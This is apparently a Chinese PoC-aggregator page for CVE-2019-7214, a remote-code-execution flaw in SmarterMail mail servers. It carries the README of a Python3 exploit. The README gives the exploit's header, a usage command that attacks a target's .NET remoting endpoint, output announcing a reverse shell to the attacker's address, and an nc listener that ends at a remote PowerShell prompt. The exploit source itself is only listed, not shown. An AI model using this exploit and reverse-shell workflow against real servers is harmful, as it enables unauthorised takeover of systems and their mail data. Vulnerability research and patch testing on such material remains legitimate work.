关联漏洞
标题:
SmarterTools SmarterMail 代码问题漏洞
(CVE-2019-7214)
描述:Smartertools SmarterTools SmarterMail是美国SmarterTools(Smartertools)公司的一套邮件服务器软件。该软件支持垃圾邮件过滤、数据统计、简单邮件传输协议SMTP验证等功能。 SmarterTools SmarterMail build 6985之前的16.x版本中存在安全漏洞。攻击者可利用该漏洞在服务器上运行命令。
描述
Python3 Rewrite of SmarterMail < Build 6985 Remote Code Execution found by 1F98D (CVE-2019-7214)
介绍
## CVE-2019-7214
```
# Exploit Title: SmarterMail < Build 6985 Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Modified Author: Drew Alleman
# Date: 10 May 2020
# Vendor Hompage: https://www.smartertools.com/
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
```
## Usage
### Sending the Exploit
```
$ python3 CVE-2019-7214.py -l 192.168.45.215 -r 192.168.111.65
[*] Attacking: tcp://192.168.111.65:17001/Servers
[*] Attempting to send exploit...
[*] Exploit sent! Check your shell at 192.168.45.215:4444
```
### Creating the Listener
NOTE: You will have to press enter once you see the `connect to xxx` message to actually start the shell.
```
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.111.65] 49788
PS C:\Windows\system32>
```
文件快照
[4.0K] /data/pocs/32e446d9ec8147f469eec739f2213add5f5c96dd
├── [9.3K] CVE-2019-7214.py
└── [1.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。